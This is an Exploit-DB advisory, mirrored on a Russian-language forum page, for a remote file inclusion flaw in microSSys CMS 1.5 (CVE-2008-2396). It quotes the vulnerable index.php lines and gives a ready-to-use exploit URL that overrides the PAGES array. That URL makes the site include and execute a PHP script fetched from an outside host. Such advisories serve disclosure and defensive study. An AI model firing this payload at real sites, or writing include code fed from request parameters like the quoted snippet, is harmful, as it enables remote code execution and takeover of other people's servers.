- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 5651
- Проверка EDB
-
- Пройдено
- Автор
- RAZ0R
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-2396
- Дата публикации
- 2008-05-19
Код:
## microSSys CMS <= 1.5 Remote File Inclusion Vulnerability
## Software site: http://wajox.com/
## ===============================================================
## By Raz0r (www.Raz0r.name)
## ===============================================================
## Vulnerable code (index.php@22-25,54-55):
## [22] if(isset($_REQUEST["1"])){
## [23] $P=$_REQUEST["1"];}else{
## [24] $P="main";
## [25] }
## [..]
## [54] if(isset($PAGES[$P])){}else{include("TH.txt");}
## [55] @include($PAGES[$P]);
## Nice...
## ===============================================================
## Exploit:
## http://host/index.php?1=lol&PAGES[lol]=http://raz0r.name/s.php
## ===============================================================
# milw0rm.com [2008-05-19]- Источник
- www.exploit-db.com
